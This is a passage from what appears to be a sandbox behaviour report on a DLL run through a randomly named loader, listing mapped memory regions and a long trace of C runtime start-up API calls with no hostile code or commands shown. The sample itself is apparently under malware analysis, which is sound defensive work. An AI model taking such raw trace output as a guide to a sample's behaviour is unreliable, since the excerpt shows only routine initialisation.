= 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 936 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 937 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 938 start_va = 0x1200000 end_va = 0x12cffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 939 start_va = 0x13c0000 end_va = 0x13cffff entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Thread: id = 42 os_tid = 0xb2c [0032.161] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f814 | out: lpSystemTimeAsFileTime=0x22f814*(dwLowDateTime=0xe0e3ffd0, dwHighDateTime=0x1d3dfba)) [0032.161] GetCurrentProcessId () returned 0xb28 [0032.161] GetCurrentThreadId () returned 0xb2c [0032.161] GetTickCount () returned 0x1732c [0032.161] QueryPerformanceCounter (in: lpPerformanceCount=0x22f80c | out: lpPerformanceCount=0x22f80c*=362842411) returned 1 [0032.162] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.162] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0032.162] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0032.162] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0032.162] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0032.162] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.162] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.162] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.162] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.163] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.163] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.163] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.163] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.163] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.163] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.163] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.163] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.163] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.163] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.163] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.164] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.164] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.164] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.164] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.164] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.164] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.164] GetCurrentThreadId () returned 0xb2c [0032.164] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomS /fn_args=\"1\"" [0032.164] GetEnvironmentStringsW () returned 0x2978b8* [0032.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0032.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13c09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0032.164] FreeEnvironmentStringsW (penv=0x2978b8) returned 1 [0032.164] GetStartupInfoA (in: lpStartupInfo=0x22f764 | out: lpStartupInfo=0x22f764*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0032.165] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0032.165] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0032.165] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0032.165] SetHandleCount (uNumber=0x20) returned 0x20 [0032.165] GetLastError () returned 0x0 [0032.165] SetLastError (dwErrCode=0x0) [0032.165] GetLastError () returned 0x0 [0032.165] SetLastError (dwErrCode=0x0) [0032.165] GetLastError () returned 0x0 [0032.165] SetLastError (dwErrCode=0x0) [0032.165] GetACP () returned 0x4e4 [0032.165] GetLastError () returned 0x0 [0032.165] SetLastError (dwErrCode=0x0) [0032.165] IsValidCodePage (CodePage=0x4e4) returned 1 [0032.165] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x22f744 | out: lpCPInfo=0x22f744) returned 1 [0032.165] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x22f210 | out: lpCPInfo=0x22f210) returned 1 [0032.165] GetLastError () returned 0x0 [0032.165] SetLastError (dwErrCode=0x0) [0032.165] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x22f1a0 | out: lpCharType=0x22f1a0) returned 1 [0032.165] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f624, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.165] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f624, cbMultiByte=256, lpWideCharStr=0x22ef88, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.165] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x22f224 | out: lpCharType=0x22f224) returned 1 [0032.165] GetLastError () returned 0x0 [0032.165] SetLastError (dwErrCode=0x0) [0032.165] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0032.165] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f624, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.166] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f624, cbMultiByte=256, lpWideCharStr=0x22ef58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ曚矲狰Ā") returned 256 [0032.166] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ曚矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.166] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ曚矲狰Ā", cchSrc=256, lpDestStr=0x22ed48, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.166] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x22f524, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÁE¦õ\\÷\"", lpUsedDefaultChar=0x0) returned 256 [0032.166] GetLastError () returned 0x0 [0032.166] SetLastError (dwErrCode=0x0) [0032.166] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f624, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.166] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f624, cbMultiByte=256, lpWideCharStr=0x22ef78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ曚矲狰Ā") returned 256 [0032.166] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ曚矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.166] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ曚矲狰Ā", cchSrc=256, lpDestStr=0x22ed68, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0032.166] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x22f424, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÁE¦õ\\÷\"", lpUsedDefaultChar=0x0) returned 256 [0032.166] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.166] GetLastError () returned 0x0 [0032.166] SetLastError (dwErrCode=0x0) [0032.166] GetLastError () returned 0x0 [0032.166] SetLastError (dwErrCode=0x0) [0032.166] GetLastError () returned 0x0 [0032.167] SetLastError (dwErrCode=0x0) [0032.167] GetLastError () returned 0x0 [0032.167] SetLastError (dwErrCode=0x0) [0032.167] GetLastError () returned 0x0 [0032.167] SetLastError (dwErrCode=0x0) [0032.167] GetLastError () returned 0x0 [0032.167] SetLastError (dwErrCode=0x0) [0032.167] GetLastError () returned 0x0 [0032.167] SetLastError (dwErrCode=0x0) [0032.167] GetLastError () returned 0x0 [0032.167] SetLastError (dwErrCode=0x0) [0032.167] GetLastError () returned 0x0 [0032.167] SetLastError (dwErrCode=0x0) [0032.167] GetLastError () returned 0x0 [0032.167] SetLastError (dwErrCode=0x0) [0032.167] GetLastError () returned 0x0 [0032.167] SetLastError (dwErrCode=0x0) [0032.167] GetLastError () returned 0x0 [0032.167] SetLastError (dwErrCode=0x0) [0032.167] GetLastError () returned 0x0 [0032.167] SetLastError (dwErrCode=0x0) [0032.167] GetLastError () returned 0x0 [0032.167] SetLastError (dwErrCode=0x0) [0032.167] GetLastError () returned 0x0 [0032.167] SetLastError (dwErrCode=0x0) [0032.167] GetLastError () returned 0x0 [0032.167] SetLastError (dwErrCode=0x0) [0032.167] GetLastError () returned 0x0 [0032.167] SetLastError (dwErrCode=0x0) [0032.167] GetLastError () returned 0x0 [0032.168] SetLastError (dwErrCode=0x0) [0032.168] GetLastError () returned 0x0 [0032.168] SetLastError (dwErrCode=0x0) [0032.168] GetLastError () returned 0x0 [0032.168] SetLastError (dwErrCode=0x0) [0032.168] GetLastError () returned 0x0 [0032.168] SetLastError (dwErrCode=0x0) [0032.168] GetLastError () returned 0x0 [0032.168] SetLastError (dwErrCode=0x0) [0032.168] GetLastError () returned 0x0 [0032.168] SetLastError (dwErrCode=0x0) [0032.168] GetLastError () returned 0x0 [0032.168] SetLastError (dwErrCode=0x0) [0032.168] GetLastError () returned 0x0 [0032.168] SetLastError (dwErrCode=0x0) [0032.168] GetLastError () returned 0x0 [0032.168] SetLastError (dwErrCode=0x0) [0032.168] GetLastError () returned 0x0 [0032.168] SetLastError (dwErrCode=0x0) [0032.168] GetLastError () returned 0x0 [0032.168] SetLastError (dwErrCode=0x0) [0032.168] GetLastError () returned 0x0 [0032.168] SetLastError (dwErrCode=0x0) [0032.168] GetLastError () returned 0x0 [0032.168] SetLastError (dwErrCode=0x0) [0032.168] GetLastError () returned 0x0 [0032.168] SetLastError (dwErrCode=0x0) [0032.168] GetLastError () returned 0x0 [0032.168] SetLastError (dwErrCode=0x0) [0032.168] GetLastError () returned 0x0 [0032.168] SetLastError (dwErrCode=0x0) [0032.168] GetLastError () returned 0x0 [0032.169] SetLastError (dwErrCode=0x0) [0032.169] GetLastError () returned 0x0 [0032.169] SetLastError (dwErrCode=0x0) [0032.169] GetLastError () returned 0x0 [0032.169] SetLastError (dwErrCode=0x0) [0032.169] GetLastError () returned 0x0 [0032.169] SetLastError (dwErrCode=0x0) [0032.169] GetLastError () returned 0x0 [0032.169] SetLastError (dwErrCode=0x0) [0032.169] GetLastError () returned 0x0 [0032.169] SetLastError (dwErrCode=0x0) [0032.169] GetLastError () returned 0x0 [0032.169] SetLastError (dwErrCode=0x0) [0032.169] GetLastError () returned 0x0 [0032.169] SetLastError (dwErrCode=0x0) [0032.169] GetLastError () returned 0x0 [0032.169] SetLastError (dwErrCode=0x0) [0032.169] GetLastError () returned 0x0 [0032.169] SetLastError (dwErrCode=0x0) [0032.169] GetLastError () returned 0x0 [0032.169] SetLastError (dwErrCode=0x0) [0032.169] GetLastError () returned 0x0 [0032.169] SetLastError (dwErrCode=0x0) [0032.169] GetLastError () returned 0x0 [0032.169] SetLastError (dwErrCode=0x0) [0032.169] GetLastError () returned 0x0 [0032.169] SetLastError (dwErrCode=0x0) [0032.169] GetLastError () returned 0x0 [0032.169] SetLastError (dwErrCode=0x0) [0032.169] GetLastError () returned 0x0 [0032.169] SetLastError (dwErrCode=0x0) [0032.169] GetLastError () returned 0x0 [0032.170] SetLastError (dwErrCode=0x0) [0032.170] GetLastError () returned 0x0 [0032.170] SetLastError (dwErrCode=0x0) [0032.170] GetLastError () returned 0x0 [0032.170] SetLastError (dwErrCode=0x0) [0032.170] GetLastError () returned 0x0 [0032.170] SetLastError (dwErrCode=0x0) [0032.170] GetLastError () returned 0x0 [0032.170] SetLastError (dwErrCode=0x0) [0032.170] GetLastError () returned 0x0 [0032.170] SetLastError (dwErrCode=0x0) [0032.170] GetLastError () returned 0x0 [0032.170] SetLastError (dwErrCode=0x0) [0032.170] GetLastError () returned 0x0 [0032.170] SetLastError (dwErrCode=0x0) [0032.170] GetLastError () returned 0x0 [0032.170] SetLastError (dwErrCode=0x0) [0032.170] GetLastError () returned 0x0 [0032.170] SetLastError (dwErrCode=0x0) [0032.170] GetLastError () returned 0x0 [0032.170] SetLastError (dwErrCode=0x0) [0032.170] GetLastError () returned 0x0 [0032.170] SetLastError (dwErrCode=0x0) [0032.170] GetLastError () returned 0x0 [0032.170] SetLastError (dwErrCode=0x0) [0032.170] GetLastError () returned 0x0 [0032.170] SetLastError (dwErrCode=0x0) [0032.170] GetLastError () returned 0x0 [0032.170] SetLastError (dwErrCode=0x0) [0032.170] GetLastError () returned 0x0 [0032.170] SetLastError (dwErrCode=0x0) [0032.170] GetLastError () returned 0x0 [0032.171] SetLastError (dwErrCode=0x0) [0032.171] GetLastError () returned 0x0 [0032.171] SetLastError (dwErrCode=0x0) [0032.171] GetLastError () returned 0x0 [0032.171] SetLastError (dwErrCode=0x0) [0032.171] GetLastError () returned 0x0 [0032.171] SetLastError (dwErrCode=0x0) [0032.171] GetLastError () returned 0x0 [0032.171] SetLastError (dwErrCode=0x0) [0032.171] GetLastError () returned 0x0 [0032.171] SetLastError (dwErrCode=0x0) 